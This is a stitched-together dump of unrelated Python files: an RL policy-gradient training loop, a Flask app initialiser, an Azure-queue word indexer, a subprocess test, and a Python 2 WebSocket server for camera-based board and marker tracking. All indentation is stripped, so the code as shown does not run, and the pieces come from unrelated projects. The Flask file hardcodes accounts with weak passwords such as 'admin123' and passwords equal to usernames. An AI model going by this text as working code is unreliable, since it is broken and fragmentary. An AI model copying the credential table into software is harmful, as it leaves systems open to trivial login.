b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no : ob_no})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
# Generalized advantage estimation
adv_n = []
idx = 0
for path in paths:
adv = 0
adv_path = []
V_next = 0
idx += len(path["reward"])
# Dynamic programming over reversed path
for rew, V in zip(reversed(path["reward"]), b_n[idx-1:None:-1]):
bellman_error = rew + gamma * V_next - V
adv = bellman_error + gae_lambda * gamma * adv
adv_path.append(adv)
V_next = V
adv_path.reverse()
# Append these advantage values
if not reward_to_go:
adv_path = [adv_path[0]] * len(adv_path)
adv_n.extend(adv_path)
# Compute a GAE version of q_n to use when fitting the baseline
q_n = b_n + adv_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n = normalize(adv_n)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
q_normalized_n = normalize(q_n)
sess.run(baseline_update_op, feed_dict={sy_ob_no : ob_no, sy_target_n : q_normalized_n})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
sess.run(update_op, feed_dict={sy_ob_no : ob_no, sy_ac_na : ac_nac, sy_adv_n : adv_n})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--gae_lambda', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
gae_lambda=args.gae_lambda,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
__init__.py
|
import redis
from apscheduler.schedulers.blocking import BlockingScheduler
from app.common.func import *
from app.model.model import PolicyEnum
from app.conf.secret import *
app_path = os.path.dirname(os.path.realpath(__file__))
redis_pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_db, password=redis_password)
# 简单初始化两个账号,实际使用时可自行接入公司内部sso
users = {
'admin': {
'password': 'admin123',
'role': [PolicyEnum.MANAGE.value, PolicyEnum.ACCESS.value]
},
'normal': {
'password': 'normal123',
'role': [PolicyEnum.ACCESS.value]
},
'joyfeng': {
'password': 'joyfeng',
'role': [PolicyEnum.ACCESS.value]
},
'tezhou': {
'password': 'tezhou',
'role': [PolicyEnum.ACCESS.value]
},
'fayliu': {
'password': 'fayliu',
'role': [PolicyEnum.ACCESS.value]
},
'zoeyzhao': {
'password': 'zoeyzhao',
'role': [PolicyEnum.ACCESS.value]
},
'jameshen': {
'password': 'jameshen',
'role': [PolicyEnum.ACCESS.value]
}
}
def init():
from threading import Thread
from app.core.jobs import status_clear
# 定时任务
scheduler = BlockingScheduler()
scheduler.add_job(status_clear, 'cron', hour=0)
Thread(target=scheduler.start, daemon=True).start()
# mongo
from mongoengine import connect
connect(
mongo_database,
username=mongo_user,
password=mongo_password,
host=mongo_host,
port=mongo_port,
connect=False
)
def create_app():
from flask import Flask
from flask_cors import CORS
from app.web import bp_api, bp_web, bp_ws
from app.core.lib import ScanThread
from app.conf.conf import cors_origin
init()
app = Flask(__name__)
app.secret_key = secret_key
CORS(bp_api, supports_credentials=True, origins=cors_origin)
CORS(bp_ws, supports_credentials=True, origins=cors_origin)
app.register_blueprint(bp_api)
app.register_blueprint(bp_web)
app.register_blueprint(bp_ws)
# jinja2 function
app.add_template_global(system_types, 'system_types')
app.add_template_global(workspace_status, 'workspace_status')
app.add_template_global(func_account, 'func_account')
app.add_template_global(is_manager, 'is_manager')
app.add_template_global(time_now, 'time_now')
app.add_template_filter(time_show, 'time_show')
app.add_template_filter(ws_roles, 'ws_roles')
app.add_template_filter(format_json, 'json_show')
app.add_template_filter(format_request, 'request_show')
app.add_template_filter(format_response, 'response_show')
app.add_template_filter(str_show, 'str_show')
app.add_template_filter(request_num, 'request_num')
# 开启扫描任务
ScanThread().start()
return app
|
lf_mapreduce.py
|
#!/usr/bin/env python
# encoding: utf-8
from os import listdir
from os.path import isfile, join
from azure.storage.queue import QueueService
from datetime import datetime
from common.common import *
import threading
import json
import random
import re
def connect_queue():
queue_service = QueueService(ACCOUNT_NAME, ACCOUNT_KEY)
return queue_service
def create_queue(queue_service, name):
print('Creating queue %s' % name)
queue_service.create_queue(name)
def queue_name(queue_num):
return '%s-d-%d' % (QUEUE_NAME, queue_num)
def queue_name_for_word(word):
return '%s-q-%s' % (QUEUE_NAME, word[0])
def random_queue_name(num_queues):
q = random.randint(0, num_queues-1)
return queue_name(q)
def crawler(path, num_queues):
files = files_in_dir(path)
for filename in files:
print('Crawling %s' % filename)
text = file_content(filename)
content = {'file': filename, 'text': text, 'timestamp:': "%s" % datetime.now()}
queue = random_queue_name(num_queues)
queue_service.put_message(queue, json.dumps(content))
def mapper(mapper_num, queues_to_check):
for queue in queues_to_check:
check_mapper_queue(mapper_num, queue)
def check_mapper_queue(mapper_num, read_queue):
while True:
messages = queue_service.get_messages(read_queue, 32)
for message in messages:
parsed = json.loads(message.message_text)
try:
filename = parsed['file']
except:
print(message.message_text)
print('Mapper %d reading from %s: %s' % (mapper_num, read_queue, filename))
wordcounts = {}
for word in words(parsed['text']):
if word in wordcounts:
wordcounts[word] += 1
else:
wordcounts[word] = 1
for word in wordcounts.keys():
write_queue = queue_name_for_word(word)
content = {'file': filename, 'word': word, 'count': wordcounts[word]}
queue_service.put_message(write_queue, json.dumps(content))
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
if (len(messages) == 0):
break
def index_writer(path, queues_to_check):
for queue in queues_to_check:
check_index_queue(path, queue)
def check_index_queue(path, read_queue):
print('Reducer reading from %s' % (read_queue))
words = {}
while True:
messages = queue_service.get_messages(read_queue, 32)
for message in messages:
parsed = json.loads(message.message_text)
try:
filename = parsed['file']
word = parsed['word']
count = int(parsed['count'])
except:
print(message.message_text)
content = {'wordcount': count, 'path': filename}
if word in words:
words[word].append(content)
else:
words[word] = [content]
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
if (len(messages) == 0):
break
letter = read_queue[-1:]
filename = '%s/%s.txt' % (path, letter)
write_json(filename, words)
def write_json(filename, content):
outfile = open(filename, 'w+')
outfile.write(json.dumps(content))
outfile.close();
def files_in_dir(path):
return [ join(path, f) for f in listdir(path) if isfile(join(path, f)) and f.endswith('.md') and not f.startswith('.') ]
def file_content(filename):
fh = open(filename)
return fh.read()
def words(text):
return re.sub("[^a-z0-9]", " ", text.lower()).split()
def slice(list, cols=2):
start = 0
for i in range(cols):
stop = start + len(list[i::cols])
yield list[start:stop]
start = stop
num_crawlers = 1
num_queues = 3
num_mappers = 5
num_index_writers = 7
queue_service = connect_queue()
all_queues = []
for q in range(0, num_queues):
name = queue_name(q)
create_queue(queue_service, name)
all_queues.append(name)
letter_queues = []
for l in range(ord('a'), ord('z') + 1):
name = queue_name_for_word(chr(l))
create_queue(queue_service, name)
letter_queues.append(name)
for l in range(ord('0'), ord('9') + 1):
name = queue_name_for_word(chr(l))
create_queue(queue_service, name)
letter_queues.append(name)
c = threading.Thread(target=crawler, args=('docs', num_queues))
c.start()
for m in range(0, num_mappers):
t = threading.Thread(target=mapper, args=(m, random.sample(all_queues, len(all_queues))))
t.start()
queue_slices = list(slice(letter_queues, num_index_writers))
for m in range(0, num_index_writers):
my_queues = queue_slices[m]
t = threading.Thread(target=index_writer, args=('out', random.sample(my_queues, len(my_queues))))
t.start()
|
test_square.py
|
import logging
import shlex
import threading
import unittest
import subprocess
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
logFormatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(name)-4s] %(message)s")
#
def launch_client_process_and_stream(command):
args = shlex.split(command)
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
logger.info("Launched process %s " % command)
for line in process.stdout:
print(line)
class TestClient(unittest.TestCase):
def test_message_passing(self):
'''
Launches two client processes, one generating random numbers and the other operator squares it
'''
self.assertEqual(True,True)
print("HELLO")
logger.info("Logged hello")
source_client_command = "python ../../../core/client/client_launcher.py source_op http://127.0.0.1:10000 --operator_path ../master/generate_random_int.pickle --debug --is_first --next_op_addr http://127.0.0.1:20208"
final_client_command = "python ../../../core/client/client_launcher.py final_op http://127.0.0.1:10000 --operator_path ../master/square_op.pickle --debug --is_final --rpc_port 20208"
source_thread = threading.Thread(target=launch_client_process_and_stream, args=[source_client_command])
final_thread = threading.Thread(target=launch_client_process_and_stream, args=[final_client_command])
final_thread.start()
source_thread.start()
source_thread.join()
final_thread.join()
if __name__ == '__main__':
unittest.main()
"python ../../../core/client/client_launcher.py source_op http://127.0.0.1:10000 --operator_path ../master/generate_random_int.pickle --debug --is_first --next_op_addr http://127.0.0.1:20208"
"python ../../../core/client/client_launcher.py op1 http://127.0.0.1:10000 --rpc_port 20208 --operator_path ../master/square_op.pickle --debug --next_op_addr http://127.0.0.1:20209"
"python ../../../core/client/client_launcher.py final_op http://127.0.0.1:10000 --rpc_port 20209 --operator_path ../master/square_op.pickle --debug --is_final"
|
server.py
|
from __future__ import with_statement
import sys, traceback
import json
import time
import cv2
import globals
import base64
import numpy as np
from random import randint
from threading import Thread
from threading import Lock
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from util import misc_util
from board.markers.marker_util import *
from board.board_descriptor import BoardDescriptor
from board.board_areas.board_area import BoardArea
from board.board_areas.tiled_board_area import TiledBoardArea
from board.markers.image_marker import ImageMarker
from board.markers.haar_classifier_marker import HaarClassifierMarker
from board.markers.shape_marker import ShapeMarker
from reporters.tiled_brick_position_reporter import TiledBrickPositionReporter
from reporters.tiled_brick_moved_reporters import TiledBrickMovedToAnyOfPositionsReporter
from reporters.tiled_brick_moved_reporters import TiledBrickMovedToPositionReporter
from reporters.find_marker_reporter import FindMarkerReporter
from reporters.find_markers_reporter import FindMarkersReporter
from reporters.marker_tracker import MarkerTracker
if misc_util.module_exists("picamera"):
print("Using Raspberry Pi camera")
from camera_pi import Camera
else:
print("Using desktop camera")
from camera_desktop import Camera
class Server(WebSocket):
"""
Server which communicates with the client library.
"""
busy_lock = Lock()
reporters = {}
reporter_thread = None
markers = {}
board_areas = {}
def handleMessage(self):
"""
Handles incoming message.
"""
try:
print("Got message: %s" % self.data)
json_dict = json.loads(self.data)
if "action" in json_dict:
action = json_dict["action"]
with self.busy_lock:
result = self.handle_action(action, json_dict["payload"])
if result is not None:
self.send_message(result=result[0], action=action, payload=result[1], request_id=result[2])
except Exception, e:
print("Exception in handleMessage: %s" % str(e))
traceback.print_exc(file=sys.stdout)
def handle_action(self, action, payload):
if action == "enableDebug":
return self.enable_debug(payload)
if action == "reset":
return self.reset(payload)
if action == "resetReporters":
return self.reset_reporters(payload)
if action == "resetReporter":
return self.reset_reporter(payload)
if action == "takeScreenshot":
return self.take_screenshot(payload)
if action == "initializeBoard":
return self.initialize_board(payload)
if action == "initializeBoardArea":
return self.initialize_board_area(payload)
if action == "initializeTiledBoardArea":
return self.initialize_tiled_board_area(payload)
if action == "removeBoardArea":
return self.remove_board_area(payload)
if action == "removeBoardAreas":
return self.remove_board_areas(payload)
if action == "removeMarker":
return self.remove_marker(payload)
if action == "removeMarkers":
return self.remove_markers(payload)
if action == "reportBackWhenBrickFoundAtAnyOfPositions":
return self.report_back_when_brick_found_at_any_of_positions(payload)
if action == "reportBackWhenBrickMovedToAnyOfPositions":
return self.report_back_when_brick_moved_to_any_of_positions(payload)
if action == "reportBackWhenBrickMovedToPosition":
return self.report_back_when_brick_moved_to_position(payload)
if action == "requestBrickPosition":
return self.request_brick_position(payload)
if action == "initializeShapeMarker":
return self.initialize_shape_marker(payload)
if action == "initializeImageMarker":
return self.initialize_image_marker(payload)
if action == "initializeHaarClassifierMarker":
return self.initialize_haar_classifier_marker(payload)
if action == "requestMarkers":
return self.request_markers(payload)
if action == "reportBackWhenMarkerFound":
return self.report_back_when_marker_found(payload)
if action == "startTrackingMarker":
return self.start_tracking_marker(payload)
def initialize_video(self, resolution):
if globals.camera is not None:
return
globals.camera = Camera()
globals.camera.start(resolution)
def initialize_reporter_thread(self):
if self.reporter_thread is None:
self.reporter_thread = Thread(target=self.reporter_run, args=())
self.reporter_thread.daemon = True
self.reporter_thread.start()
def reset(self, payload):
"""
Resets the board.
requestId: (Optional) Request ID
cameraResolution: (Optional) Camera resolution in [width, height]. Default: [640, 480].
"""
resolution = payload["resolution"] if "resolution" in payload else [640, 480]
globals.board_descriptor = BoardDescriptor()
self.reset_board_descriptor()
self.initialize_reporter_thread()
self.reset_reporters({})
self.remove_board_areas({})
self.remove_markers({})
self.initialize_video(resolution)
return "OK", {}, self.request_id_from_payload(payload)
def reset_board_descriptor(self):
"""
Resets the board descriptor with standard values.
"""
globals.board_descriptor.board_size = [1280, 800]
globals.board_descriptor.border_percentage_size = [0.0, 0.0]
def enable_debug(self, payload):
"""
Enables debug output.
requestId: (Optional) Request ID
"""
globals.debug = True
return "OK", {}, self.request_id_from_payload(payload)
def take_screenshot(self, payload):
"""
Take a screenshot and saves it to disk.
requestId: (Optional) Request ID
filename: (Optional) Screenshot filename
"""
image = globals.camera.read()
if image is not None:
filename = "debug/board_{0}.png".format(time.strftime("%Y-%m-%d-%H%M%S"))\
if "filename" not in payload else payload["filename"]
cv2.imwrite(filename, image)
return "OK", {}, self.request_id_from_payload(payload)
else:
return "CAMERA_NOT_READY", {}, self.request_id_from_payload(payload)
def initialize_board(self, payload):
"""
Initializes board with given parameters.
requestId: (Optional) Request ID
borderPercentage: (Optional) Border [width, height] in percentage of board size.
cornerMarker: (Optional) Corner marker
"""
globals.board_descriptor = BoardDescriptor()
self.reset_board_descriptor()
globals.board_descriptor.border_percentage_size = [
payload["borderPercentage"][0] if "borderPercentage" in payload else 0.0,
payload["borderPercentage"][1] if "borderPercentage" in payload else 0.0
]
globals.board_descriptor.corner_marker = create_marker_from_name(payload["cornerMarker"], marker_id=-1) if "cornerMarker" in payload else DefaultMarker(marker_id=-1)
return "OK", {}, self.request_id_from_payload(payload)
def initialize_board_area(self, payload):
"""
Initializes board area with given parameters.
requestId: (Optional) Request ID
id: (Optional) Area id
x1: X1 in percentage of board size.
y1: Y1 in percentage of board size.
x2: X2 in percentage of board size.
y2: Y2 in percentage of board size.
"""
board_area = BoardArea(
payload["id"] if "id" in payload else None,
[payload["x1"], payload["y1"], payload["x2"], payload["y2"]],
globals.board_descriptor
)
self.board_areas[board_area.area_id] = board_area
return "OK", {"id": board_area.area_id}, self.request_id_from_payload(payload)
def initialize_tiled_board_area(self, payload):
"""
Initializes tiled board area with given parameters.
requestId: (Optional) Request ID
id: (Optional) Area id
tileCountX: Number of horizontal tiles.
tileCountY: Number of vertical tiles.
x1: X1 in percentage of board size.
y1: Y1 in percentage of board size.
x2: X2 in percentage of board size.
y2: Y2 in percentage of board size.
"""
board_area = TiledBoardArea(
payload["id"] if "id" in payload else None,
[payload["tileCountX"], payload["tileCountY"]],
[payload["x1"], payload["y1"], payload["x2"], payload["y2"]],
globals.board_descriptor
)
self.board_areas[board_area.area_id] = board_area
return "OK", {"id": board_area.area_id}, self.request_id_from_payload(payload)
def remove_board_areas(self, payload):
"""
Removes all board areas.
requestId: (Optional) Request ID
"""
self.board_areas = {}
return "OK", {}, self.request_id_from_payload(payload)
def remove_board_area(self, payload):
"""
Removes the given board area.
requestId: (Optional) Request ID
id: Area ID.
"""
area_id = payload["id"]
del self.board_areas[area_id]
return "OK", {}, self.request_id_from_payload(payload)
def remove_markers(self, payload):
"""
Removes all markers.
requestId: (Optional) Request ID
"""
self.markers = {}
return "OK", {}, self.request_id_from_payload(payload)
def remove_marker(self, payload):
"""
Removes the given marker.
requestId: (Optional) Request ID
id: Marker ID.
"""
marker_id = payload["id"]
del self.markers[marker_id]
return "OK", {}, self.request_id_from_payload(payload)
def report_back_when_brick_found_at_any_of_positions(self, payload):
"""
Reports back when object is found in any of the given positions.
requestId: (Optional) Request ID
areaId: Board area id
validPositions: Positions to search for object in.
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id.
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
valid_positions = payload["validPositions"]
stability_evel = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickPositionReporter(
board_area,
valid_positions,
stability_evel,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickFoundAtPosition",
payload={"id": reporter_id, "position": tile},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def report_back_when_brick_moved_to_any_of_positions(self, payload):
"""
Reports back when object is found in any of the given positions other than the initial position.
requestId: (Optional) Request ID
areaId: Board area id
initialPosition: Initial position.
validPositions: Positions to search for object in.
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id.
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
initial_position = payload["initialPosition"]
valid_positions = payload["validPositions"]
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickMovedToAnyOfPositionsReporter(
board_area,
initial_position,
valid_positions,
stability_level,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickMovedToPosition",
payload={"id": reporter_id, "position": tile, "initialPosition": initial_position},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def report_back_when_brick_moved_to_position(self, payload):
"""
Reports back when object is found at the given position.
requestId: (Optional) Request ID
areaId: Board area id
position: Position for brick to be found
validPositions: Positions to search for object in
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
position = payload["position"]
valid_positions = payload["validPositions"]
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickMovedToPositionReporter(
board_area,
position,
valid_positions,
stability_level,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickMovedToPosition",
payload={"id": reporter_id, "position": tile},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def request_brick_position(self, payload):
"""
Returns object position from given positions.
requestId: (Optional) Request ID
areaId: Board area id
validPositions: Positions to search for object in
"""
image = self.take_photo()
if image is None:
return "CAMERA_NOT_READY", {}
globals.board_descriptor.snapshot = globals.board_recognizer.find_board(image, globals.board_descriptor)
if globals.board_descriptor.is_recognized():
board_area = self.board_areas[payload["areaId"]]
valid_positions = payload["validPositions"]
position = globals.brick_detector.find_brick_among_tiles(board_area, valid_positions)[0]
if position is not None:
return "OK", {"position": position}, self.request_id_from_payload(payload)
else:
return "BRICK_NOT_FOUND", {}, self.request_id_from_payload(payload)
else:
return "BOARD_NOT_RECOGNIZED", {}, self.request_id_from_payload(payload)
def initialize_image_marker(self, payload):
"""
Initializes image marker with given parameters.
requestId: (Optional) Request ID
markerId: Marker id
imageBase64: Image as base 64 encoded PNG
minMatches: (Optional)Minimum number of required matches
"""
raw_image = base64.b64decode(payload["imageBase64"])
raw_bytes = np.asarray(bytearray(raw_image), dtype=np.uint8)
image = cv2.imdecode(raw_bytes, cv2.CV_LOAD_IMAGE_UNCHANGED)
marker_id = payload["markerId"]
min_matches = payload["minMatches"] if "minMatches" in payload else 8
image_marker = ImageMarker(marker_id, image, min_matches=min_matches)
self.markers[marker_id] = image_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def initialize_haar_classifier_marker(self, payload):
"""
Initializes haar classifier marker with given parameters.
requestId: (Optional) Request ID
markerId: Marker id
dataBase64: Base 64 encoded Haar Cascade Classifier data
"""
cascade_data = base64.b64decode(payload["dataBase64"])
marker_id = payload["markerId"]
haar_classifier_marker = HaarClassifierMarker(marker_id, cascade_data)
self.markers[marker_id] = haar_classifier_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def initialize_shape_marker(self, payload):
"""
Initializes a shape marker with given image and parameters.
requestId: (Optional) Request ID
markerId: Marker id
shape: (Optional)Shape
imageBase64: (Optional)Image as base 64 encoded PNG
minArea: (Optional)Minimum area in percent of destination image
maxArea: (Optional)Maximum area in percent of destination image
"""
marker_id = payload["markerId"]
if "shape" in payload:
contour = np.int32(payload["shape"]).reshape(-1, 1, 2)
shape_marker = ShapeMarker(marker_id,
contour=contour,
min_area=payload["minArea"] if "minArea" in payload else 0.0025,
max_area=payload["maxArea"] if "maxArea" in payload else 0.9)
else:
raw_image = base64.b64decode(payload["imageBase64"])
raw_bytes = np.asarray(bytearray(raw_image), dtype=np.uint8)
image = cv2.imdecode(raw_bytes, cv2.CV_LOAD_IMAGE_UNCHANGED)
shape_marker = ShapeMarker(marker_id,
marker_image=image,
min_area=payload["minArea"] if "minArea" in payload else 0.0025,
max_area=payload["maxArea"] if "maxArea" in payload else 0.9)
self.markers[marker_id] = shape_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def report_back_when_marker_found(self, payload):
"""
Reports back when marker is found.
requestId: (Optional) Request ID
areaId: Board area id
markerId: Marker id
stabilityLevel: (Optional) Minimum board area stability level before searching for marker
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
marker = self.markers[payload["markerId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
stability_level = payload["stability_level"] if "stability_level" in payload else 0.98
reporter = FindMarkerReporter(
board_area,
marker,
stability_level,
reporter_id,
callback_function=lambda (marker): self.send_message(result="UPDATE",
action="markerFound",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"marker": filter_out_contour_from_marker_result(marker)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def request_markers(self, payload):
"""
Searches for the specified markers in given area.
requestId: (Optional) Request ID
areaId: Board area id
markerIds: List of marker id's
stabilityLevel: (Optional) Minimum board area stability level before searching for markers
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
markers = [self.markers[marker_id] for marker_id in payload["markerIds"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.0
reporter = FindMarkersReporter(
board_area,
markers,
stability_level,
reporter_id,
callback_function=lambda (result): self.send_message(result="UPDATE",
action="markersFound",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"markers": filter_out_contour_from_marker_result_list(result)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def start_tracking_marker(self, payload):
"""
Starts tracking marker.
requestId: (Optional) Request ID
areaId: Board area id
markerId: Marker id
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
marker = self.markers[payload["markerId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
reporter = MarkerTracker(
board_area,
marker,
reporter_id,
callback_function=lambda (marker): self.send_message(result="UPDATE",
action="markerTracked",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"marker": filter_out_contour_from_marker_result(marker)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def reset_reporters(self, payload):
"""
Stops and resets all reporters.
requestId: (Optional) Request ID
"""
for (_, reporter) in self.reporters.iteritems():
reporter.stop()
return "OK", {}, self.request_id_from_payload(payload)
def reset_reporter(self, payload):
"""
Stops and resets the reporter with given ID.
requestId: (Optional) Request ID
id: Reporter ID.
"""
reporter_id = payload["id"]
self.reporters[reporter_id].stop()
return "OK", {}, self.request_id_from_payload(payload)
def take_photo(self):
"""
Returns the most recent photo from the camera.
"""
return globals.camera.read()
def notify_board_not_recognized(self, board_snapshot):
"""
Notifies client that board has not been recognized for an amount of time. If corner information is given
from board recognizer it returns a list of unrecognized corners [topLeft, topRight, bottomLeft, bottomRight].
:param board_snapshot Board snapshot
"""
if board_snapshot is not None and board_snapshot.missing_corners is not None:
self.send_message("BOARD_NOT_RECOGNIZED", "recognizeBoard",
{"unrecognizedCorners": board_snapshot.missing_corners})
else:
self.send_message("BOARD_NOT_RECOGNIZED", "recognizeBoard", {})
# Output debug image
if globals.debug and board_snapshot is not None:
cv2.imwrite("debug/board_not_recognized_{0}.png".format(time.time()), board_snapshot.camera_image)
def notify_board_recognized(self):
"""
Notifies client that board has again been recognized.
"""
self.send_message("BOARD_RECOGNIZED", "recognizeBoard", {})
def send_message(self, result, action, payload={}, request_id=None):
"""
Sends a new message to the client.
:param result Result code
:param action Client action from which the message originates
:param payload Payload
:param request_id: Request ID. If none given, random ID is generated
"""
message = {"result": result,
"action": action,
"payload": payload,
"requestId": request_id if request_id is not None else self.random_id()}
self.sendMessage(json.dumps(message, ensure_ascii=False, encoding='utf8'))
print("Sent message: %s" % message)
def handleConnected(self):
print self.address, 'connected'
def handleClose(self):
self.reset_reporters({})
print self.address, 'closed'
def random_id(self):
while True:
reporter_id = randint(0, 100000)
if reporter_id not in self.reporters:
return reporter_id
def reporter_run(self):
board_recognized_time = time.time()
while True:
# Sleep a while
time.sleep(0.01)
try:
# Read image from camera
if globals.camera is None:
continue
image = globals.camera.read()
if image is None:
continue
# Do all in a lock to force sequential execution of handleMessage above
with self.busy_lock:
# Recognize board
if globals.board_descriptor is not None:
globals.board_descriptor.snapshot = globals.board_recognizer.find_board(image, globals.board_descriptor)
# Board not recognized
if not globals.board_descriptor.is_recognized():
# Notify client that board is not recognized
if board_recognized_time is not None and time.time() > board_recognized_time + globals.board_not_recognized_notify_delay:
self.notify_board_not_recognized(globals.board_descriptor.snapshot)
board_recognized_time = None
#cv2.imwrite("board.png", image)
else:
#cv2.imwrite("board.png", globals.board_descriptor.snapshot.board_image())
# Notify client that board is recognized
if board_recognized_time is None:
self.notify_board_recognized()
board_recognized_time = time.time()
# Update board areas
if globals.board_descriptor.is_recognized():
for (_, board_area) in self.board_areas.copy().iteritems():
board_area.update_stability_score()
# Run all reporters
reporter_ids_to_remove = []
for (reporter_id, reporter) in self.reporters.copy().iteritems():
# Run reporter
reporter.run_iteration()
# Check if stopped
if reporter.stopped:
reporter_ids_to_remove.append(reporter_id)
# Remove stopped reporters
for reporter_id in reporter_ids_to_remove:
self.reporters.pop(reporter_id)
except Exception, e:
print("Exception in reporter loop: %s" % str(e))
traceback.print_exc(file=sys.stdout)
def request_id_from_payload(self, payload):
"""
Returns payload from request. If no payload given, a random ID is generated.
:param payload: Payload
:return: Request ID from payload, or random if none given
"""
return payload["requestId"] if "requestId" in payload else self.random_id()
def start_server():
print("Starting server...")
server = SimpleWebSocketServer('', 9001, Server)
server.serveforever()
|
websocket_connection.py
|
"""
Class used to process Web Socket Connections. Messages sent from the connecting clients, web socket connections,
are received in here.
"""
from __future__ import print_function
import gzip
import json
import logging
import time
from jupyter_geppetto import settings
from pyecore.ecore import EList
